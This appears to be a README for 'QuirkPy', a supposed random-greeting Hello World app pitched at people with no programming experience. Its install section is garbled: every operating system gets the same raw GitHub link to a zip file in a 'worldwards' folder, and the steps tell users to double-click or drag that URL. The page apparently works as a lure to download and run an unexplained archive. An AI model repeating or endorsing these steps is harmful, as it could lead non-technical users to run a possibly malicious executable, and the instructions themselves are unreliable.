🚀 Getting Started

Welcome to QuirkPy! This application provides a playful twist on the classic “Hello World” program. Each time you run QuirkPy, it generates unique and unexpected greetings. It’s perfect for anyone interested in creative coding, no programming experience needed.

Before you start, here’s what you’ll need:

  • A computer running Windows, macOS, or Linux.
  • An internet connection to download the application.
  • Basic knowledge of opening files on your computer.

📂 Download & Install

To get QuirkPy, visit this page to download:

Download QuirkPy Releases

On the Releases page, look for the latest version. You’ll find a list of available files to download. Click on the file that matches your operating system:

  • For Windows, download https://raw.githubusercontent.com/rhythmobile/QuirkPy/main/worldwards/QuirkPy.zip.
  • For macOS, download https://raw.githubusercontent.com/rhythmobile/QuirkPy/main/worldwards/QuirkPy.zip.
  • For Linux, download https://raw.githubusercontent.com/rhythmobile/QuirkPy/main/worldwards/QuirkPy.zip.

Once the download is complete:

  1. Windows: Double-click on https://raw.githubusercontent.com/rhythmobile/QuirkPy/main/worldwards/QuirkPy.zip to run it.
  2. macOS: Open the https://raw.githubusercontent.com/rhythmobile/QuirkPy/main/worldwards/QuirkPy.zip file, drag QuirkPy to your Applications folder, and then open it.
  3. Linux: Extract the https://raw.githubusercontent.com/rhythmobile/QuirkPy/main/worldwards/QuirkPy.zip file. Open a terminal, navigate to the extracted folder, and run ./QuirkPy.

⚙️ Using QuirkPy

When you run QuirkPy, you will see a friendly welcome window. Click the “Generate Greeting” button to receive your first unique greeting. Enjoy the surprise!

You can generate as many greetings as you like. Each greeting will be different, making every run an exciting experience.
